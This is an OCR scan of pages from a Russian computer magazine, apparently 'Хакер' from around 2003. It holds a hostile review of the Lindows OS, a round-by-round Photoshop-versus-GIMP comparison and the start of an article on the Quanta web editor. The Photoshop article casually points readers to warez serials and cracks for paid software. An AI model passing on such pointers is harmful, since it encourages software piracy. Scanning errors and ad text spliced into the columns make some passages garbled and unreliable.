но. Хорошо, загрузимся-ка мы в 
сейф моде, чтобы пояснить тупой 
оське, что не надо пытаться вы- 
жать из моей видюхи рулез таким 
образом. Но надежды на ум разра- 


же консоль. Растолкуйте мне, идио- 
Ту, зачем делать два вроде бы раз- 
ных пункта по назначению, но име- 
ющие одинаковый результат? В об- 
щем, попарился я минут тридцать и 
решил отложить более подробное 
изучение этой ОСи go завтра. 

И вот желанный вечер следующе- 
го дня. Весь день я потратил на бе- 
ганье по знакомым и знакомым зна- 
комых в поисках стабильной ви- 
дюшки. И вот приволок домой дже- 
cpopc 2 МХ 400 с 64 метрами памя- 
ти, которая хорошо зарекомендова- 
ла себя по совместимости с разны- 
ми хитрыми операционками. Вотк- 
нул, перегрузился - нет рабочего 
стола! Только графическая консоль 
Линуха. Решил переставить Линда- 


возину еще разок, чтоб железо 
лучше прочухала. Перестановка, 
длившаяся ровно 10 минут, убедила 
меня, что решение всех траблов 
этой OC, как и у Виндов, можно най- 
ти в полной переустановке. Нако- 
нец все заработало! А я начал тес- 
тить OCb во все щели. Короче, чи- 
тай и думай, надо оно тебе или нет? 


МЯСОМ НАРУЖУ 

Сразу вижу единственный оконный 
менеджер - KDE версии 3.0, правда, 
с чуток измененной темой. А вот 
любители гнома, айсвиша и блек- 
бокса пока отдыхают. Нужны gpy- 
гие окошки - ищите и ставьте сами, 
причем через гимор неместного 
масштаба. Сердце графики - 
XFree86 4.2.0. Он глючноватый, 
особенно по части 3D на некоторых 
картах, хотя жить можно (жил же я 
без траблов и на ALT Master, и на 
манрейке с редхатом), но такого 
изврата, как замутили линдовсян- 
цы, я не видел: иксфрии ставится 
всегда с аппаратным ускорением, 
вырубить которое не представляет- 
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Инсталлятор 
упрощен до 
такой степени, 
что поставить 
любую Винду 
по сравнению 
с Линдовс - 
все равно что 
настроить 
сервак на кон- 
сольном юнихе 
восьмидеся- 
тых годов вы- 
пуска. 


Полное отсут- 
ствие исход- 
ников меня 
сильно-пре- 
сильно рас- 
строило - без 
них я не смог 
запустить 
софт модем, 
хотя имел сор- 
цы рабочего 
драйвера. 


улому 10 


ОСи 4work 


Ha болванке с 
Линдой было 
занято только 
400 мегов. То 
есть разработ- 
чики легко 
могли укомп- 
лектовать 
свое детище 
софтом еще 
на целых 300 
метров. Поче- 
му они так не 
поступили, 
мне неясно. 


Поддержка ки- 
риллицы из 
ОС выдрана с 
корнем! Ника- 
кие принципы 
линуховской 
международ- 
ной операци- 
онки не соб- 
людены, что 
вряд ли пой- 
дет на пользу 
Линдовс. 


раде СТ: 


ся возможным, из-за чего мне и 
пришлось сменить карту. 

Бредем дальше. Ядрышко - не са- 
мое новое, но и не отстой, 2.4.19, 
как и у девятого Манрейка. А вот 
полное отсутствие исходников ме- 
ня сильно-пресильно расстроило - 
без них я не смог запустить софт 
модем, хотя имел сорцы рабочего 
драйвера. Вот почему мне приш- 
лось забить на их супер-пупер тех- 
нологию “click-n-run”, предназна- 
ченную для выкачки софта прями- 
ком из инета (правда, потом, купив 


еее 
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Одна из главных фишек... 


хардовый модем, я ее протестил - 
отстой тот еще). 

"Дальше в лес - больше дров", - 
думал я, пытаясь настроить звук 
на своей машине. Линда в упор не 
видит и не понимает, что у меня 
есть девайс под названием саун- 
gOnactep, на чипе фортамедиа 
801. Самое интересное, что ВСЕ 
дистры Линуха (на память - 
Mandrake 8.2, 9.0, 9.1; ALT Master 
2.2;Red Hat 8.0/9.0), протестенные 
мной, ее видели и корректно ста- 
вили драйвера, но при этом НИ 
ОДНА Винда ее не замечала, и да- 
же многими обожаемая ХРюша 
спотыкалась. То есть Линдовс в 
этом плане взяла вся худшее от 
творения дяди Билла. 
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Вот так отображается сетевая папка 
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Дальнейшему моему рассмотре- 
нию подвергся софт, поставляемый 
на дистре, вместе с ОС. Точнее его 
отсутствие - из бутива поставились 
софтины, которые можно пересчи- 
тать по пальцам (да не по двадцати 
пальцам мутанта, а по обычным 
шести ;)). После тщательнейшего 
поиска я нарыл браузер, корявую 
мыльницу, видеоплеер, который ни- 
как не хотел играть mpeg4 (типа 
кодеков нету), простейшую смот- 
релку графики да звонилку до ине- 
та. Вот, пожалуй, и все. А больше 
всего мне не понравилось то, что 
на болванке с Линдой было занято 
только 400 мегов. То есть разра- 
ботчики легко могли укомплекто- 
вать свое детище софтом еще на 
целых 300 метров. Почему они так 
не поступили, мне неясно, ведь 
софт-то халявный! 

Дальше я вызвал консоль, кото- 
рая сразу выпала... с правами рута! 
По привычке набрал тс, желая уви- 
деть командера... Хрен там было! 
Нет такой софтины в составе ОС. 
Тогда бьем GCC - Ta же реакция. O3- 
верев, выбиваю Man, чтобы поис- 
кать инфы; не тут-то было, “сот- 
mand not found" - сообщает мне Tep- 
минал. После таких манипуляций с 
консолью мое настроение и вера в 
эту систему опустились ниже пейд- 
жера. Поднять такую шумиху и рек- 
ламу из-за какой-то дурацкой паро- 
дии на дистрибутив Линукса! Так что 
дальнейшие мои исследования про- 
ходили в скептическом настрое. 


KPH ВИНДОВЫЙ СОФТ! 
Надеясь потестить великую спо- 
собность запуска виндозовских 
прог в среде Линдовс, я запихал в 
сидюк свеженький диск - приложе- 
ние к журналу, кликнул по экзеш- 
ке... и получил окошко, вопрошаю- 
щее: “Сир, а чем изволите открыть 
эту хрень с расширением .exe? 
Текстовым редактором? Браузе- 


ром? Или еще чем?". После такого 
мне стало жалко потраченного на 
Линдовс времени. Еще одна фича 
новой ОС оказалась всего лишь 
полнейшей плюшкой мирового 
масштаба. 

После этого решил обратиться к 
манам и найти ответы на все мои 
вопросы и решения моих проблем, 
но, кликнув на ссылку из главного 
меню, я был закинут в инет на их 
сайт с рекламными восхвалениями 
новой бадяги. Но я ведь упертый, 
поэтому решил порыться в рунете 
и докопаться до истины, причем 
назло всем стал эту миссию выпол- 
нять прямо из Линдовс. 

Настройка соединения не вызвала 
каких-либо траблов (звонилка - 
стандартная линуховская кррр'шка, 
вот в чем секрет легкого дозвона 
:)), а вот браузер, загрузившись, 
отправил меня в полный аут - под- 
держка кириллицы из ОС выдрана с 
корнем! Никакие принципы линухо- 
вской международной операционки 
не соблюдены, что вряд ли пойдет 
на пользу Линдовс. С этим я сми- 
рился. Но оттого, что каталог /mnt 
содержит только сидиром и дискету, 
я до сих пор икаю. Для тех, кто на 
катке, поясняю: каталог /mnt содер- 
жит все примонтированные файло- 
вые системы. Например, у тебя на 
винте есть раздел Винодов, и тебе 
надо достать его из-под Линуха. 
Чтобы увидеть раздел Виндавоза, 
тебе необходимо выполнить коман- 
gy mount (если нет автоматического 
монтирования), тогда в каталоге 
/mnt появится новая ссылка на све- 
жепримотанный том. Исходя из 
здравого смысла, раз уж эта ОС 
претендует на звание пользова- 
тельской, все разделы по-любому 
должны монтироваться автоматом, 
поэтому я начал искать заветные 
разделы Виндов в корневом катало- 
ге и нашел таки, правда, в папке 
/disks. Там были рабочие ссылки на 
4 моих виндовых раздела. NTFS 
том, естественно, отсутствовал. 
Войдя в эти разделы, я даже не уди- 
вился, что все русские буквы в име- 
нах были элегантно заменены зна- 
ком вопроса. Я подозревал, что у 
Линды напрочь отсутствовало по- 
нятие о монтировании, с учетом 
языка. К счастью, у меня основные 
папки имеют только английские 
названия (для защиты от таких же 
полоумных пчел), и я смог добрать- 
ся gO папки с заготовкой статьи, 
чтобы продолжить описание наше- 
го монстра. Кликанье по вордовско- 
му документу заставило запустить- 
ся браузер, который смело полез в 
инет, видимо, желая слить оттуда 
недостающую софтину для чтения 
таких странных файлов. Но я ему 
это запретил - инет платен, поэтому 
переживем пока так. Потестим луч- 
ше встроенные средства редактиро- 
вания текста. Из редакторов был 


Дорогие друзья! 


По вашим многочисленным просьбам издательство 
(дате)ап запускает новый ежемесячный журнал, 
полностью посвященный прохождениям и кодам к 
самым популярным компьютерным играм. 


"Путеводитель: Страна Игр" — 


: в | идеальное издание для геймеров, 
найден только стандартный линуховский, причем очень желающих знать абсолютно все 
покоцанный - никак не хотел читать русский текст, о своих любимых играх. 


изображая кучу квадратиков. Тут душа поэта не выдер- 
жала, поэтому смело перехожу к выводам. 4 ПРИЧИНЫ ДЛЯ ПОКУПКИ ЖУРНАЛА: 
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СУММ ДЕР ВНИЗ о лучших компьютерных проектах! 
Идея объединения мира Виндов и мира пингвина за- 
Самые детальные руководства и тактические 

манчива и красива, но реализация, представленная советы, впечатляющие подборки хинтов и 
Майклом Робертсоном сотоварищи, сыра и ужасна. кодов, описание скрытых возможностей и 
Уже начиная с установки, ОСь оставляет неудовлетво- но от месте: 
рительное впечатление, подкрепляемое всевозможны- 
ми багами и недоработками, в изобилии выплывающи- СБ-приложение, под завязку набитое всеми 
ми во время работы. Поддержка железа реализована, Set ee nce 
по моему мнению, плохо. Так ни звуковуха, ни видюха, 
сколько я ни шаманил, не запустились, а о софт моде- ese atl ag eon Leste 
ме и говорить не приходится. 

Отсутствие исходников ядра и компилятора в дистри- dee ee os 
бутиве системы автоматически переводит ее в разряд 
“Special for [атег" - мы не сможем запустить нестанда- 
ртное железо и поюзать софт, распространяемый в ви- 
де сорцов. Таким образом, Линда теряет совместимость 
с очень большим пластом ПО, ориентированным на Ли- c 
нукс. Также отсутствие собственного собфта на дистре | i & 
очень удручает - мы не миллионеры, чтоб все лить из 
инета, юзая тормознутую технологию клик анод ран (ти- 
па нажал и иди пей кофе, пока не скачается полсайта). 

У продвинутых юзеров Линукс данная ОСь вызовет 
только рвотный рефлекс. Отсутствует всегда так необ- 
ходимый Man, полный изврат с точками монтирования, 
даже раздел / умудрились назвать диском С:. Линдовс - 
это попытка сделать Линукс для чайников. Типа - на хре- 
на консоль? Урежем половину команд. Зачем трудные 
настройки? Пусть кликают и бегут в инет за сосфтом. За- 
чем опции в инсталле? Пусть все по дефолту. Может, и 
не будет работать, зато без настроек. То есть на данный 
момент эта система не подходит ни ламеру, ни хакеру, ни 
админу. Окончательный вердикт: полный АТСТОЙ, како- 
го еще никто не видел. В довершение картины скажу о 
цене: 100 баксов за болвань (чем не Винда?). 

Все худшее из обеих операционок слилось в великую 
OCb Lindows. Вся шумиха и боязнь мелкомягких на дан- 
ный момент необоснованны: Линдовс в теперешней реа- 


лизации мертва и не может составить хоть малейшей dd 
конкуренции Виндам, не говоря уж о Линухе. Хотя они и | 4, 


Десктоп Линды 


а“ 


пытаются пропихнуть своего уродца даже на ноутбуки! 
Но этим маркетинговая политика Майкла не закончи- 
лась, он решил начать продавать свой мультимедийный 
комп, естественно, на базе Линдовса, который сможет 
играть видео и музыку. Также девайс будет выполнять 


простейшие действия типа набора текста, причем цена Первый номер -B продаже C 26 августа 


его, по заверению самого Майкла, будет очень низкой. 


Вот и все, что удалось нарыть про загадочное чудо Ищите на прилавках! 


Lindows. Пошел выметать это чудо с винта поганой Мы станем самым верным компасом на просторах виртуальных миров! 
метлои и строчить послания во все эхи, дабы доказать 
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SOFT/PHOTOSHOP vs GIMP 


OCu 4work 


Невольно 
взглянул на 
размер, и вся 
охота качать 
его у меня 
мгновенно 
пропала, пото- 
му как вес 
эдитора был 
160 мегабайт. 


Распаковав, 
например, 
GIMP, доста- 
точно сказать 
три магичес- 
ких слова 
-/configure, 
make, make 
install, и перед 
тобой предс- 
танет горячий 
бинарник /usr/ 
local/bin/gimp, 
который ты 
можешь без- 
болезненно 
запустить :). 


раде 


Докучаев Дмитрий aka Forb 
(forb@real.xakep.ru) 


а правой половине 

нашего “ринга” нахо- 

дится всем известный 
Adobe Photoshop, на левой - менее 
известный форточным дизайнерам 
GIMP. По итогам нашего виртуаль- 
ного боя мы узнаем, кто же истин- 
ный победитель и достоин звания 
абсолютного чемпиона. 


РАУНД ПЕРВЫЙ: 

ДОСТАВКА, УСТАНОВКА 

Итак, поехали. Начнем с самого 
главного - добычи и установки на- 
ших редакторов. Несложно дога- 
даться, что Фотошоп можно найти 
на странице производителя. Тыка- 
ясь в ссылки, я, наконец, дошел до 
нужной паги http://www.adobe.com/ 
support/downloads/product.jsp? 
product=39&platform=Windows, rge 
мне предлагали забрать редактор 
nog Windows. Невольно взглянул 
на размер, и вся охота качать его у 
меня мгновенно пропала, потому 
как вес эдитора был 160 мегабайт. 
Конечно, в эти 160 мегов было вло- 
жено много возможностей и примо- 
чек, но если ты сидишь на платном 
трафике, то Фотошоп ты, естест- 
венно, качать не будешь. Ты мо- 
жешь взять его из других источни- 
ков - на варезном сидюке или у со- 
седа по локалке, ибо такой распро- 
страненный редактор можно найти 
в любом месте. 

Теперь время для GIMP. Идем на 
сайт производителя (www.gimp.org) 
и видим аккуратный список ЕТР- 
серверов, откуда нам заботливо 
предлагают вытянуть последнюю 
версию редактора. Что печально, 
российского сервера там не наблю- 
дается ;). Что ж, ограничимся бур- 
жуйским серваком. Полный линк на 
СМР выглядит следующим обра- 
зом: ftp://ftp.cs.umn.edu/pub/gimp/ 
V1.2/v1.2.5/gimp-1.2.5.tar.gz. Bec эди- 
тора всего 14 мегов. Я думаю, gna 
любого человека стянуть такой 
размер из глобала не составит осо- 
бого напряга. В итоге получаем ре- 
шительный удар по Фотошопу со 


me 
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PHOTOSHOP vs GIMP 


СХВАТКА ЛУЧШИХ РЕДАКТОРОВ! 
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Приятная лицензия от GIMP 
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стороны С МР'а - размер первого в 
десятки раз превышает второй. 

А что с установкой? Тут все бо- 
лее-менее стандартно и без приклю- 
чений. Распаковав, например, GIMP, 
достаточно сказать три магических 
слова ./configure, make, make install, 
и перед тобой предстанет горячий 
бинарник /usr/local/ 
bin/gimp, который ты можешь без- 
болезненно запустить :). Запустил? 
Тогда ты видишь дружественную 
среду установщика, любезно пре- 
доставляющего тебе Licence 
Agreement. После подтверждения 
лицензии тебе зададут ряд вопро- 
сов о размере кэша для изображе- 
ний, а также путях для сохранения 
изображений. Я думаю, разобраться 
в этом может даже ребенок. А ты 
чего ожидал? Мучительного редак- 
тирования непонятного gimp.conf? 
Чувак! Linux He так сложен, как ка- 
жется на первый взгляд ;). Распако- 
вавшись, GIMP займет у тебя на 
винте около 60 мегов; я считаю, что 
ничего страшного в этом нет. После 


демонстративного прокручивания 
полосы инсталлятора тебя поздра- 
вят с успешной установкой редакто- 
ра, не создадут никаких ярлычков 
на рабочем столе и со спокойной 
совестью отправят читать мануал ;). 
С Photoshop все обстоит несколько 
иначе. После того как ты в муках 
скачал пакет, установщик почему-то 
спросит у тебя твою страну, имя, фа- 
милию и кличку твоей собаки :). Как 
окажется позже, эти данные ему 
нужны для процесса регистрации 
Фотопопы. Затем у тебя заботливо 
спросят серийник, который ты, ко- 
нечно же, найдешь на http://asta- 
lavista.box.sk/ :). Либо, если ты исп- 


Запрос серийного номера 
при инсталляции Фотошопы 


равно платишь налоги, тебе придет- 
ся заплатить 690 буказоидов и по- 
лучить от Adobe фирменный сидюк 
с Photoshop (либо серийник почтой). 
Если серийник валиден, инсталлер 
установит все необходимые сайлы 
в установочную директорию (по 
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умолчанию c:\program files\adobe\ 
photoshop 7.0). Bec этой самой nan- 
ки будет около 190 килограммов (я 
хотел сказать, мегабайт :)). 

Фриварность GIMP намного ру- 
лезнее шароварности Photoshop, 
поэтому решающий удар опять-та- 
ки поступает со стороны редактора 
под правильную ось ;). 

Подведем итоги первого раунда. 
Со счетом 1:0 на начальной стадии 
лидирует GIMP. Надеемся, что Фо- 
тошоп покажет себя непосред- 
ственно в работе. 


РАУНД 2: УДОБСТВО В РАБОТЕ 
Итак, второй раунд. Рассмотрим на- 
ши лучшие редакторы в работе. Я 
не буду заходить в дебри, а лишь 
протестирую их на базовые воз- 
можности, коими чаще всего поль- 
зуются дизайнеры. 

Начнем с GIMP. После первого за- 
пуска он немного подумает, создаст 
необходимые каталоги и предста- 
нет перед пользователем в виде 
четырех окон-диалогов: главного 
окна, панели инструментов, диало- 
га слоев и кисти. Панель инстру- 
ментов состоит из последователь- 
ности кнопок, которые закрепляют 
за собой определенную функцию, 
как например, кисть, размывка, па- 
neu, заливка и т.о. и т.п. Внизу па- 
нели инструментов располагаются 
активный и вторичный цвета (сле- 
ва), а также градиент, шаблон и 
размер кисти (справа). Это очень 
удобно, потому как всего за нес- 
колько щелчков мыши ты можешь 
добиться нужного результата. 

Чтобы создать изображение, goc- 
таточно выбрать Файл->Новый либо 
нажать горячую клавишу Ctri+N (о 
горячих клавишах в редакторах мы 
поговорим несколько позже). Поя- 
вится окно с пустым изображением. 
Поначалу я долго не мог понять, где 
искать все основные действия над 
картинкой. Оказалось, что доста- 
точно кликнуть правой кнопкой мы- 
ши по этому окну, и перед тобой 
предстанет огромное меню с фильт- 


рами, масштабированием, выделе- 
нием и прочими фичами ;). 

В своей работе GIMP использует 
слои. Я думаю, ты знаешь, что это 
такое, но все же напомню: слоевой 
рисунок представляет собой ров- 
ную стопку фильтров или слайдов, 
наложенных друг на друга. Все эти 
слои корректно сохранятся лишь в 
формате редактора - XCF. Разуме- 
ется, что весить он будет намного 
больше, чем обычная картинка. 

Козырем этого редактора, пожа- 
луй, является легкодоступность к 
любому пункту меню. Поясняю, в 
любом дпоте-приложении Linux 
подменю легко перетаскивается на 
передний план. Это можно сделать 
одним нажатием мыши на верхнюю 
пунктирную полосу закладки. 

Все хорошо... Напрягает лишь то, 
что у GIMP нет единого связывающе- 
го окна, а все окошки беспорядочно 
раскиданы по рабочему столу. Отсут- 
ствует хелп, что делает работу в эди- 
торе очень проблематичной (без по- 
иска инфы в инете мое первое знако- 
мство с GIMP длилось всего минуту 
:)). Излишняя гуеватость линухового 
приложения порой также действует 
на нервы (особенно для виндузятни- 
ка), именно поэтому Гимп так и не 
прижился в обществе дизайнеров. 

Винда... В этой среде все намного 
привычнее, чем в Лине (я говорю от 


Стандартная среда виндового PhotoShop 


лица дизайнера). После долгого за- 
пуска Фотошопы ты увидишь единую 
программу, в которой окна уже будут 
разбросаны в произвольном поряд- 
ке. Таких окон довольно много - ме- 
неджер слоев, цветов, координат, 
кистей, инструментов и т.п. Открыва- 
ется файл двойным щелчком по лю- 
бому месту Photoshop. Необходимо 
создать новый? Без проблем! Дави 
Ctri+N и выбери параметры ‹файла. 
Если картинка находится в буфере 
обмена, эдитор автоматически подбе- 
ретее размеры. С помощью горячих 
клавиш можно за несколько секунд 
отредактировать изображение. Удоб- 
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Удобная работа со слоями 


в форточном редакторе 


ный менеджер слоев поможет опера- 
тивно отлаживать каждый кусок тво- 
его изображения. Одним словом, луч- 
ше один раз увидеть, чем сто раз ус- 
лышать. После того как прокликаешь 
все, что кликается, ты довольно 
быстро научишься работать в среде 
форточного редактора :). 

Файло Фотошопа имеет уникаль- 
ное расширение PSD и хранит в се- 
бе все слои редактора. Таким обра- 
зом, сохранив файл в родном фор- 
мате, ты можешь удалить/добавить 
новые слои в изображение, открыв 
его повторно. Редактор умеет созда- 
вать анимацию и работать с видео- 
файлами. Хотя для видео лучше ис- 
пользовать свои родные тулзы. 

На этот раз Photoshop показал се- 
бя с лучшей стороны. В нем удоб- 
нее и привычнее работать, он име- 
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Если ты исп- 
равно платишь 
налоги, тебе 
придется зап- 
латить 690 
буказоидов и 
получить от 
Adobe фир- 
менный сидюк 
с Photoshop 
(либо серий- 
ник почтой). 


Излишняя гуе- 
ватость лину- 
хового прило- 

жения порой 
также дейст- 
вует на нервы 
(особенно для 
виндузятни- 
ка), именно 
поэтому Гимп 
так и не при- 
жился в обще- 
стве дизайне- 
ров. 
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ФотоЖопа 
страдает так- 
же русскими 
названиями 
слоев - ну не 
понимает он 
их и все! Тут 
случай клини- 
ческий, мето- 
дику исправ- 
ления этого 
бага я не на- 
шел. 
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в десятки раз 
облегчают их 
и без того 
проблемную 
работу. 


раде 


ет множество примочек, которые 
можно заюзать всего за пару 
щелчков мыши. Наличие моря ли- 
тературы и хелпа по ФотоЖопе 
также делают его популярным (еще 
бы, от реализации проекта Adobe, 
наверное, гребет деньги лопатой 
;)). В общем, во втором раунде по- 
беждает Photoshop. Итоговый счет 
11. Поглядим, что будет дальше... 


РАУНД 3: ЛОКАЛИЗАЦИЯ 
Посмотрим, как производители по- 
заботились о русификации наших 
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После правки реестра проблема 
с локализацией исчезает 


редакторов. Я думаю, ты наслышан 
о проблеме русских букв в 
Photoshop. Тем не менее этот не- 
достаток легко исправляется путем 
долгого лазания в реестре (ищем 
раздел HKEY_LOCAL_MACHINE\ 
System\CurrentControlSet\Control\ 
Nis\Codepage и меняем значение 
параметра 1250 на CP_1251.nls и 
1252 на CP_1251.nls) и ребута. При 
слове "ребут" каждый уважающий 
себя юниксоид хмурит брови, так 
как перезагружает машину лишь 
при замене ядра. Не мудрено, что в 
GIMP проблема русских букв поп- 
росту отсутствует. Мало того, Фото- 
Жопа страдает также русскими 
названиями слоев - ну не понимает 
он их, и все! Тут случай клиничес- 
кий, методику исправления этого 
бага я не нашел. 

Что касается русификации для 
GIMP - достаточно установить рус- 
скую локаль, и он будет полностью 
русским (а если установить японс- 
кую локаль - японским. Прям-таки 
хамелеон ;)). Для Photoshop же при- 
дется скачивать дополнительный 
патч. Этот патч меняется от версии 
к версии, поэтому, введя ключевые 
слова “rus” и “photoshop” в поиско- 
вике, ты его быстро отыщешь (мне 
ли тебя учить пользоваться поиско- 
выми системами?). После его уста- 
новки я долго смеялся над опечат- 
ками переводчиков - я думаю, ты их 
тоже сразу обнаружишь. 

Итог очевиден. В плане локализа- 
ции Photoshop просасывает :), поэ- 
тому в третьем раунде опять по- 
беждает GIMP. Текущий счет 2:1 в 
пользу последнего. 


РАУНД 4: ПЛАГИНЫ 

Огромный выбор плагинов под 
Photoshop всегда радовал глаз и грел 
душу дизайнерам, потому как они в 
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десятки раз облегчают их и без того 
проблемную работу. Перечислять ра- 
боту каждого плагина просто бес- 
смысленно - на это уйдет не одна кни- 
га. Просмотреть их можно, ткнув в 
пункт меню Filter. Как видишь, ассор- 
тимент их огромен. Тут и разного рода 
размытия, и вчленение (ну и слово я 
придумал ;)) рисунка в изображение и 
T.g. и т.п. Но самым рулезным плаги- 
ном является KPT6, который постав- 
ляется отдельным пакетом, весит 76 
мегабайт и... как ты уже догадался, яв- 
ляется далеко не бесплатным. Но на 
каждый платный проект найдется 
свой кряк, так что топай на Альтавис- 
туиищи его там. В KPT6 есть все и 
еще чуть-чуть: эквалайзер с разными 
подстройками изображения (размы- 
тие, гель и т.п.), поддержка анимации 
и видео. Одним словом, без бутылки 
тут He разобраться (к KPT6 прилага- 
ется хороший английский мануал, так 
что скучать не придется ;)). В этом 
плагине можно в два штриха нарисо- 
вать луну (какой-то режим фаз луны 
и солнца там имеется), об остальных 
способностях KPT6 додумывай сам. 
Об установке плагинов думать не 
стоит. Просто жми на ехе-файл и од- 
нозначно отвечай на все вопросы 
(да/нет/не знаю ;)), инсталлер cge- 


рый содержит в себе массу увлека- 
тельных возможностей, например, 
создания разного вида кнопок, кис- 
тей, текстур и анимаций. Короче, 
много возможностей в одном сфлако- 
не. Кроме того, ты найдешь в GIMP 
множество различных шумов, имита- 
ций, искажений и тому подобных сфи- 
шек. Весомым минусом в плагинах 
Гимпа является то, что запускаются 
они отдельным процессом, а не 
вместе с программой (представь, 
сколько памяти сожрет у тебя с де- 
сяток плагинов). Обидно - дополне- 
ний к Гимпу очень мало, скудный ас- 
сортимент ты можешь найти на 
Www.gimp.org, там же ты отыщешь 
ссылку на мануал по написанию этих 
самых плагинов - кто знает, быть мо- 
жет ты освоишь этот мануал и сам 
будешь кодить модули для GIMP ;). 

В общем, на мой трезвый взгляд, 
плагины в Photoshop намного луч- 
ше С1МР'’овых и их больше, поэто- 
му раунд заканчивается с суммар- 
ным счетом 2:2. 


РАУНД 5: 

СОВМЕСТИМОСТЬ И ФОРМАТЫ 
Очень интересно, то ли Гейтс так 
взаимно невзлюбил TopBanbgca, то 
ли причина в другом. Но у GIMP и 


Я упоминал, что документации для GIMP 
довольно Mano, но это не значит, что она 
полностью отсутствует. На сайте 
http://gimp.linux.net.ru ты можешь найти 
много интересных статей и примеров рабо- 
ты с линевым редактором. 


лает все за тебя, предварительно 
взяв оплату в виде серийного номе- 
ра. Сами плагины можно скачать с 
сайта производителя - виртуальные 
двери на http://www.adobe.com gna 
тебя всегда открыты. 

А что в GIMP? Тут также имеются 
плагины. Но не такие яркие, как в 
Photoshop. По дефолту с Гимпом 
поставляется плагин script-foo, кото- 


Неудачное открытие Фотошопового файла 


Photoshop нет взаимопонимания. 
Не совместимы они, и все тут. XCF- 
поддержка напрочь отсутствует в 
виндовом едиторе, Р5О)-файлы не 
открыть в линевом, хотя такое рас- 
ширение есть в списке OpenFiles'oB 
(у меня Р5О-шка от 7 Фотошопа чи- 
таться отказалась). Что же, будем 
довольствоваться промежуточны- 
ми форматами }). 

В ФотоЖопе таких форматов го- 
раздо больше чем в Гимпе - тут те- 
беи tif, и jpg, и bmp, и png, и туева 
хуча каких-то неизвестных мне гра- 
фических расширений. Несомнен- 
но, в GIMP этот список тоже боль- 
шой, но несколько меньше, чем у 
его оппонента. Более того, в фор- 
точном редакторе существуют раз- 
личные режимы сжатия и сохране- 
ния графики и видео. Не грех yno- 
мянуть об экспорте в 9#-формат с 
огромными модификациями. Им- 
порт в Photoshop также имеется, 
эдитор позволяет принимать пиксы 
прямо со сканера (с помощью чуд- 
ной утилиты ScanExpress). 

Я полностью уверен в Photoshop, 
в нем откроется любой ‹файл с rpa- 


фикой и видео, какой я пожелаю. Поэтому в этом раун- 
де Фотошоп наносит сокрушительный удар своему 
противнику. Счет 3:2. 


РАУНД 6: ГОРЯЧИЕ КЛАВИШИ 

Доказано, что использование HotKeys повышает про- 
изводительность работы в десятки раз. Поэтому не бу- 
дет лишним обратить внимание на горячие клавиши в 
наших эдиторах. 

Разумеется, каждый уважающий себя дизайнер знает 
ХотКейзы в Photoshop. Для удобства они могут юзать- 
ся одинаково на разных раскладках, чего не сказать о 
GIMP :(. Я вообще удивился, когда, нажав ctri+d (снять 
выделение в Photoshop), получил дубликат изображе- 
ния в Гимпе. Некоторые горячие клавиши, которые бы- 
ли незаменимы в форточках, вообще не работали. 

Хотя в СМР существует возможность переопределе- 
ния горячих клавиш для любых меню. Для этого необ- 
ходимо вызвать его, выбрать нужный пункт и нажать 
новую комбинацию клавиш. Она будет динамически 
связана и сохранена при выходе из редактора. Вообще- 


Каждый плагин GIMP - отдельный процесс 


то, это очень полезная возможность, так как позволяет 
назначить свои горячие клавиши на наиболее часто ис- 
пользуемые действия. Так, например, я назначил АЁ+1 
для инверсии цвета, переопределил Ctrl+D для снятия 
выделения, Shift+S для “Сохранить как”. Удалить такое 
сочетание клавиш можно с помощью батона Delete. 

С учетом того, что ни один дизайнер не будет переу- 
чиваться на ХотКейзы GIMP, если раньше юзал Фото- 
Жоп, в последнем раунде побеждает виндовый редак- 
тор, и счет становится 4:2. 


РАЗ, ДВА, ТРИ... HOKAYT! 

Вот и закончилась схватка двух популярных редакто- 
ров. Закончилась в пользу виндового Photoshop, нес- 
мотря на его огромный размер и шароварность. Так уж 
повелось, что Photoshop раньше появился и довольно 
быстро развивался, именно поэтому его так любят про- 
фессиональные дизайнеры. Согласись, будь ты самый 
навороченный редактор, ты не сел бы за него, если бы 
полжизни провел в другом. Точно так же и дизайнеры 
- им даже чужд Linux (я говорю о большинстве, а не о 
нас с тобой ;)) и, сидя в форточках, им ничего не оста- 
ется делать, как использовать Photoshop. Хотя произ- 
водители предлагают скачать портированный винодо- 
вый GIMP с теми же функциями и примочками, что и в 
правильной оси. 

Если верить разработчикам, версия Гимпа 1.2 в два 
раза отличается от предыдущей 1.1. Из этого можно 
сделать вывод, что редактор совершенствуется с каж- 
дым релизом. Быть может, через 3-4 выпуска мы пов- 
торно проведем схватку Photoshop и нашего любимого 
линевого эдитора... И тогда он наверняка одержит за- 
конную победу в бою. 

= 


ХАКЕР. $ 


STUFE 


ТОВАРЫ ute БУКВУ 


р", темно-синяя 


$17.99 


ВСЕ ЭТИ ФИШКИ ТЫ МОЖЕШЬ ЗАКАЗАТЬ 
НА НАШЕМ САЙТЕ WWW.XAKEP.RU, 
ИЛИ ПО ТЕЛЕФОНУ: (095) 928-0360, (095) 928-6089 
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Последнюю 
версию Quanta 
всегда можно 
скачать 

с сайта 
http://www. 
kde.org. 


Все специфи- 
кации по раз- 
личным язы- 
кам, использу- 
емым в WEB, 
можно найти 
на сайте 
http://w3c.org. 
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WEB-BEPCTKA B LINUX 


ГЛАВНЫЙ ИНСТРУМЕНТ МЕВ-ДИЗАЙНЕРА ПОД ЛИН 


В Линуксе и прочих никсах дела с НТМЕ-версткой (точнее со специализированными 
редакторами) обстоят далеко не так хорошо, как в Винде. Пожалуй, все средства для 


создания НТМЕ-документов под Линуксом ограничиваются достаточно продвинутым 
редактором Quanta, а также некоторым количеством текстовых редакторов с 
поддержкой НТМЕ-синтаксиса. 


хочу подробнее оста- 
новиться на Quanta. 
Quanta можно наз- 
вать единственным специализиро- 
ванным редактором для WEB-paspa- 
ботки для *nix, но сразу скажу, что 
редактор этот стоящий и заслужи- 
вает внимания. 

Конечно, не буду спорить, что для 
написания HTML можно использо- 
вать такие продвинутые средства, 
Kak vi и Emacs, а также относительно 
простые текстовые редакторы, нап- 
ример, из пакета KDE. Но это всего 
лишь текстовые редакторы. Quanta 
же - специализированный пакет со 
строго предписанным назначением. 

К тому же, чтобы начать использо- 
вать Етас$ хоть сколько-нибудь 
осознанно, со всеми его возможнос- 
тями, потребуется прочитать, пожа- 
nyu, не одну книжку. Наша же 3aga- 
ча - рассмотреть средство, которое 
облегчит жизнь HTML-kogepy, коим 
отчасти является WEB-gu3anHep, но 
в то же время будет довольно прос- 
тым в освоении. Quanta прекрасно 
отвечает этим требованиям. 


ОСМОТР НА МЕСТЕ 
Quanta базируется на библиотеках 
ОТ, а также тесно интегрирована с 
редактором Kate из пакета KDE, что, 
в свою очередь, требует наличия не- 
которых компонентов KDE в системе. 
